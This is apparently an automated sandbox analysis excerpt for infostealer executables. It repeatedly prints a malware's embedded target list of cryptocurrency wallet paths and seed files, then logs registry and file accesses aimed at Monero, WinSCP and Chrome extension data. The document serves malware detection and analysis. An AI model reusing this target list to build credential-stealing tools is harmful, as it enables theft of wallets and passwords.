Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000002.2620868713.0000000001E1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000002.2620868713.0000000001E1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live}

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
